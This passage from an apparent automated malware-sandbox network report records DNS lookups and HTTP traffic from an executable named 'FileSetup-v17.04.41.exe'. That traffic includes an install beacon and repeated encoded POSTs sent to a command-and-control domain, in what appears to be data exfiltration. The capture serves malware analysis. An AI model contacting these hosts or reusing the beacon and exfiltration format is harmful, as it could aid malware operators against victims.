                                                                                                                                              Jan 29, 2021 11:00:18.326832056 CET5680353192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 11:00:18.383100986 CET53568038.8.8.8192.168.2.3
                                                                                                                                              Jan 29, 2021 11:00:18.762240887 CET5714553192.168.2.38.8.8.8
                                                                                                                                              Jan 29, 2021 11:00:18.818572044 CET53571458.8.8.8192.168.2.3

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 29, 2021 10:57:39.154855013 CET | 192.168.2.3 | 8.8.8.8 | 0xbbc6 | Standard query (0) | 84cfba021a5a6662.xyz | A (IP address) | IN (0x0001)
Jan 29, 2021 10:57:53.872057915 CET | 192.168.2.3 | 8.8.8.8 | 0xabd0 | Standard query (0) | 84cfba021a5a6662.xyz | A (IP address) | IN (0x0001)
Jan 29, 2021 10:57:54.856245041 CET | 192.168.2.3 | 8.8.8.8 | 0xae4f | Standard query (0) | 84cfba021a5a6662.xyz | A (IP address) | IN (0x0001)
Jan 29, 2021 10:58:49.066128969 CET | 192.168.2.3 | 8.8.8.8 | 0x7e9f | Standard query (0) | 84CFBA021A5A6662.xyz | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 29, 2021 10:57:39.214333057 CET | 8.8.8.8 | 192.168.2.3 | 0xbbc6 | No error (0) | 84cfba021a5a6662.xyz | | 104.21.23.16 | A (IP address) | IN (0x0001)
Jan 29, 2021 10:57:39.214333057 CET | 8.8.8.8 | 192.168.2.3 | 0xbbc6 | No error (0) | 84cfba021a5a6662.xyz | | 172.67.208.74 | A (IP address) | IN (0x0001)
Jan 29, 2021 10:57:53.928330898 CET | 8.8.8.8 | 192.168.2.3 | 0xabd0 | No error (0) | 84cfba021a5a6662.xyz | | 104.21.23.16 | A (IP address) | IN (0x0001)
Jan 29, 2021 10:57:53.928330898 CET | 8.8.8.8 | 192.168.2.3 | 0xabd0 | No error (0) | 84cfba021a5a6662.xyz | | 172.67.208.74 | A (IP address) | IN (0x0001)
Jan 29, 2021 10:57:54.918409109 CET | 8.8.8.8 | 192.168.2.3 | 0xae4f | No error (0) | 84cfba021a5a6662.xyz | | 104.21.23.16 | A (IP address) | IN (0x0001)
Jan 29, 2021 10:57:54.918409109 CET | 8.8.8.8 | 192.168.2.3 | 0xae4f | No error (0) | 84cfba021a5a6662.xyz | | 172.67.208.74 | A (IP address) | IN (0x0001)
Jan 29, 2021 10:58:49.123408079 CET | 8.8.8.8 | 192.168.2.3 | 0x7e9f | No error (0) | 84CFBA021A5A6662.xyz | | 104.21.23.16 | A (IP address) | IN (0x0001)
Jan 29, 2021 10:58:49.123408079 CET | 8.8.8.8 | 192.168.2.3 | 0x7e9f | No error (0) | 84CFBA021A5A6662.xyz | | 172.67.208.74 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• 84cfba021a5a6662.xyz

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49725 | 104.21.23.16 | 80 | C:\Users\user\Desktop\FileSetup-v17.04.41.exe

Timestamp | kBytes transferred | Direction | Data
Jan 29, 2021 10:57:39.274213076 CET | 107 | OUT | POST //fine/send HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 84
Host: 84cfba021a5a6662.xyz
Jan 29, 2021 10:57:39.274293900 CET | 107 | OUT | Data Raw: 74 79 70 65 3d 69 6e 73 74 61 6c 6c 26 73 65 6c 6c 65 72 3d 69 6e 73 74 61 6c 6c 70 33 26 70 72 69 63 65 3d 2d 30 2e 33 26 67 75 69 64 3d 35 30 31 34 46 46 42 35 37 45 36 44 45 44 41 33 26 76 65 72 3d 34 36 2e 30 2e 30 26 6f 72 69 67 69 6e 3d 65
Data Ascii: type=install&seller=installp3&price=-0.3&guid=5014FFB57E6DEDA3&ver=46.0.0&origin=exe
Jan 29, 2021 10:57:39.961137056 CET | 118 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Jan 2021 09:57:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=dcd5867eff6278b419fd878640dc80da71611914259; expires=Sun, 28-Feb-21 09:57:39 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 07ef2cc36e00000c25ae1a7000000001
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=owKbgFiPy568IFUYqlzyW5C9zX5ixZkzRw2Ny%2FxG6CC18mqnycq5gwIOG3mfGcKiUf8oKWJz822fmlkufnxnDmwXaXSg0UFF2FtehpzhFp1oGUbYLg%3D%3D"}],"group":"cf-nel"}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 61921718a9eb0c25-AMS
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Jan 29, 2021 10:57:39.976404905 CET | 119 | OUT | POST /info_old/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 93
Host: 84cfba021a5a6662.xyz
Jan 29, 2021 10:57:39.976480961 CET | 119 | OUT | Data Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 66 43 34 4d 6d 78 65 6f 75 42 36 59 55 39 41 58 6c 30 34 51 4d 37 4d 7a
Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwfC4MmxeouB6YU9AXl04QM7MzC4zd7fupg~~
Jan 29, 2021 10:57:41.399874926 CET | 126 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Jan 2021 09:57:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=db3cecb1faef337e8ee8acd50f99f8b4e1611914260; expires=Sun, 28-Feb-21 09:57:40 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 07ef2cc62c00000c25d989d000000001
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=R5gGxqqdket0bLDx9VZxg6FznStJe8BokGLb%2BEn4c7WhLRiPcw8By4EEZFhOGdjZbpYuNRK%2F3G2kMD6AowlzFHW5vv%2BaJD%2F00afruZTl8Lk%2B93DVIA%3D%3D"}],"group":"cf-nel"}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 6192171d1da50c25-AMS
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
Jan 29, 2021 10:57:41.489664078 CET | 129 | OUT | POST /info_old/w HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
upgrade-insecure-requests: 1
Content-Length: 93
Host: 84cfba021a5a6662.xyz
Jan 29, 2021 10:57:41.489733934 CET | 130 | OUT | Data Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 51 67 42 36 51 6e 2d 32 54 51 62 4e 73 52 42 4a 62 66 74 68 5a 32 4c 44
Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwQgB6Qn-2TQbNsRBJbfthZ2LDs3NzMbcYA~~
Jan 29, 2021 10:57:44.276484966 CET | 156 | IN | HTTP/1.1 200 OK
Date: Fri, 29 Jan 2021 09:57:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d6ea9ef90a7c3fd89f2bb7d01119a1f791611914261; expires=Sun, 28-Feb-21 09:57:41 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
cf-request-id: 07ef2ccc1500000c2504afc000000001
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=6gFIOjEUaqpru2TjB39K7Ekfaq8XH2apH7NJZEcHGb%2BuID3NQ3hvh83hoexqDLNWM93dEh%2FCjkyF3Zc3VZLyJWPH2SLLXBOGH6uWyAePNmYDPR%2FhDA%3D%3D"}],"group":"cf-nel"}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Server: cloudflare
CF-RAY: 619217268cbf0c25-AMS
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
                                                                                                                                              Jan 29, 2021 10:57:46.477119923 CET162OUTPOST /info_old/w HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Content-Length: 93
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:57:46.477178097 CET | 162 | OUT | Data Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 66 43 34 4d 6d 78 65 6f 75 42 36 37 4e 53 55 63 6d 52 79 30 63 6c 52 4a
                                                                                                                                              Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwfC4MmxeouB67NSUcmRy0clRJIN3FaDyew~~
                                                                                                                                              Jan 29, 2021 10:57:50.713327885 CET | 163 | IN | HTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:57:50 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=d7b376252b991b256fff07790d731cb8b1611914266; expires=Sun, 28-Feb-21 09:57:46 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2cdf9300000c25c3a27000000001
                                                                                                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=M7fA%2BXqzQohGspvLdIHbK5VYQcnz9ZkeRixG1IkuRGbQTwGIycTUkwiAVpRLlC%2BQ9u6oVcAyS868J3i4MCSzTWyX9uzQKqId%2Bg3bkOM8mLZnZhEXKQ%3D%3D"}],"group":"cf-nel"}
                                                                                                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 61921745bf710c25-AMS
                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0


                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                              1 | 192.168.2.3 | 49730 | 104.21.23.16 | 80 | C:\Users\user\Desktop\FileSetup-v17.04.41.exe
                                                                                                                                              Timestamp | kBytes transferred | Direction | Data
                                                                                                                                              Jan 29, 2021 10:57:53.984832048 CET | 164 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Content-Length: 81
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:57:53.984879017 CET | 164 | OUT | Data Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 54 36 50 4c 5f 4a 46 63 65 4f 4e 6c 70 4d 53 36 63 69 50 56 4a 55 7e
                                                                                                                                              Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwT6PL_JFceONlpMS6ciPVJU~
                                                                                                                                              Jan 29, 2021 10:57:58.149625063 CET | 176 | IN | HTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:57:58 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=d9e369f6c99215b0d17e70a31fffcf7931611914274; expires=Sun, 28-Feb-21 09:57:54 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2cfce400004c616f24a000000001
                                                                                                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Opu6pZqmp0PKWqKnTyD4A1NUg6q6S4Q3OM9O09FBNm%2FwfgLvssO4gtOQqsav8STl%2Fi6OEAjFAPxg29mgOAdV8cbggfyNy47spKCalU%2FcrJ0RLRuSXA%3D%3D"}],"group":"cf-nel"}
                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 61921774a9384c61-AMS
                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0
                                                                                                                                              Jan 29, 2021 10:58:07.034818888 CET | 275 | OUT | POST /info_old/e HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Content-Length: 677
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:58:07.034873962 CET | 276 | OUT | Data Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 6c 35 2d 55 57 4f 59 52 6d 51 30 33 71 49 4f 6a 4e 6a 67 64 56 44 64 79 51 39 79 39 62 4e 42 46 4f 4b 58 78 76 53 37 45 4e 6e 58 6d 67 6b 68 31 37 44 51 72 77 6a 69 51 42 39 6a 33 50 66 6c 35 5f 6a
                                                                                                                                              Data Ascii: info=4u25ymXISBzl5-UWOYRmQ03qIOjNjgdVDdyQ9y9bNBFOKXxvS7ENnXmgkh17DQrwjiQB9j3Pfl5_j53G2ZkUjQM1Fgo6r0jMO7leiY9oVM77olzx6aSF71wth7Z8ypVDs3XGzhTIJz9Ln0J-vVtxEq7lfjLdx5MPBU1A6qVTl-8scn_weQtC8W9ZKFI2fZRdHu8haZovnFMOlLlxTLodSbo4FI9rEiPmgP90FCGtJHAUAp
                                                                                                                                              Jan 29, 2021 10:58:08.430646896 CET | 278 | IN | HTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:58:08 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=daa0e19361d0474b2299fe6b65a91e7c51611914287; expires=Sun, 28-Feb-21 09:58:07 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2d2fde00004c617387d000000001
                                                                                                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=KEjjwmrAp9Kln6OaOCOw4HCAPa2vcPeYzEN3M2%2BF7Eo9l%2FQ3L419HZpo52K45DJlWWXjFG7e9X8YaRmzFbmSEJrrotzIhqm%2FSHaOLDH%2FIQgsb3G35w%3D%3D"}],"group":"cf-nel"}
                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 619217c63cfe4c61-AMS
                                                                                                                                              Data Raw: 31 0d 0a 31 0d 0a
                                                                                                                                              Data Ascii: 11
                                                                                                                                              Jan 29, 2021 10:58:08.430690050 CET | 278 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0
                                                                                                                                              Jan 29, 2021 10:58:08.452989101 CET | 278 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Content-Length: 81
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:58:08.453020096 CET | 278 | OUT | Data Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 65 53 52 47 70 7a 37 61 53 72 65 66 69 64 71 63 73 38 62 73 51 4d 7e
                                                                                                                                              Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKweSRGpz7aSrefidqcs8bsQM~
                                                                                                                                              Jan 29, 2021 10:58:14.426819086 CET | 474 | IN | HTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:58:14 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=d32fdfb63199d4edc23fbae53552b02111611914288; expires=Sun, 28-Feb-21 09:58:08 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2d356900004c61660aa000000001
                                                                                                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1K9EG0%2FwVBwf8mM3dZB%2FUrCgGXdoa7nI%2BtUY9I4vVkaQ0z2CC4yppRSWRVLlQzW3LFSor6Pj8OfdGox2%2FQn4GYKzVFnjMNYQH0Y%2BjXRW3wHd2YiXdA%3D%3D"}],"group":"cf-nel"}
                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 619217cf0f154c61-AMS
                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0
                                                                                                                                              Jan 29, 2021 10:58:14.787164927 CET | 475 | OUT | POST /info_old/g HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Content-Length: 1405
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:58:14.787204027 CET | 476 | OUT | Data Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 7a 6c 35 2d 55 57 4f 59 52 6d 51 30 33 71 49 4f 6a 4e 6a 67 64 56 44 64 79 51 39 79 39 62 4e 42 46 4f 4b 58 78 76 53 37 45 4e 6e 58 6d 67 6b 68 31 37 44 51 72 77 6a 69 51 42 39 6a 33 50 66 6c 35 5f 6a
                                                                                                                                              Data Ascii: info=4u25ymXISBzl5-UWOYRmQ03qIOjNjgdVDdyQ9y9bNBFOKXxvS7ENnXmgkh17DQrwjiQB9j3Pfl5_j53G2ZkUjQM1Fgo6r0jMO7leiY9oVM5Vwz1ScmteJDE7w10psZ_00qMctjeo9yHIdrimRhlTyqoq04YBQNY38-9gvcqKkwKC2J2Vfvi-G14KPQvG-1i6sWAfJLJ64NhtuEoHoC_r48CvN7Q4vs-izMqS79aOTgkOPi
                                                                                                                                              Jan 29, 2021 10:58:16.177582979 CET | 477 | IN | HTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:58:16 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=d0735860e1690b2ce5099884fb2722c3c1611914294; expires=Sun, 28-Feb-21 09:58:14 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2d4e2800004c618f0d1000000001
                                                                                                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=hp5Lw2GXSaX376m6zOC78rDpbceeERcTYw8vJ12Yamvzk9QHk1awWh1dFPQ7aGk0eg2bC7b0ca0IRPBCanUSjVskDQcIdeQVU2DIxPcDK9kbpp3%2FSQ%3D%3D"}],"group":"cf-nel"}
                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 619217f6aecf4c61-AMS
                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0
                                                                                                                                              Jan 29, 2021 10:58:16.211626053 CET | 478 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Content-Length: 81
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:58:16.211760998 CET | 478 | OUT | Data Raw: 69 6e 66 6f 3d 34 75 32 35 79 6d 58 49 53 42 79 6e 63 69 79 70 37 68 48 64 42 6c 4c 31 36 79 66 77 37 6f 53 30 43 43 71 79 6c 57 5a 4a 53 4e 4c 51 4a 43 59 66 76 42 67 4b 77 58 61 32 75 79 39 70 59 70 4d 62 41 5a 36 54 49 59 2d 75 79 51 59 7e
                                                                                                                                              Data Ascii: info=4u25ymXISBynciyp7hHdBlL16yfw7oS0CCqylWZJSNLQJCYfvBgKwXa2uy9pYpMbAZ6TIY-uyQY~
                                                                                                                                              Jan 29, 2021 10:58:20.519503117 CET | 505 | IN | HTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:58:20 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=dca96338e8c36fc4bd98a59d252997faf1611914296; expires=Sun, 28-Feb-21 09:58:16 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                              cf-request-id: 07ef2d53ba00004c616db60000000001
                                                                                                                                              Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=TNxb7U72LVZloZomDxQl6JoVFNJA%2BBbYJjmE%2BmWM2%2FLtcIJZOwG2cM1BL4vHYxP1lPQ7Y%2F37Uf%2BdH5CZhNWzknzKjJBqD609GbF80ruVYhDMh1rrwA%3D%3D"}],"group":"cf-nel"}
                                                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                              Server: cloudflare
                                                                                                                                              CF-RAY: 619217ff8ca54c61-AMS
                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                              Data Ascii: 0
                                                                                                                                              Jan 29, 2021 10:58:20.522950888 CET506OUTGET /info_old/r HTTP/1.1
                                                                                                                                              Cache-Control: no-cache
                                                                                                                                              Connection: Keep-Alive
                                                                                                                                              Pragma: no-cache
                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                              Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                              upgrade-insecure-requests: 1
                                                                                                                                              Host: 84cfba021a5a6662.xyz
                                                                                                                                              Jan 29, 2021 10:58:21.874977112 CET553INHTTP/1.1 200 OK
                                                                                                                                              Date: Fri, 29 Jan 2021 09:58:21 GMT
                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                              Connection: keep-alive
                                                                                                                                              Set-Cookie: __cfduid=d42c56b9a586b24a78b65756275cba5401611914300; expires=Sun, 28-Feb-21 09:58:20 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
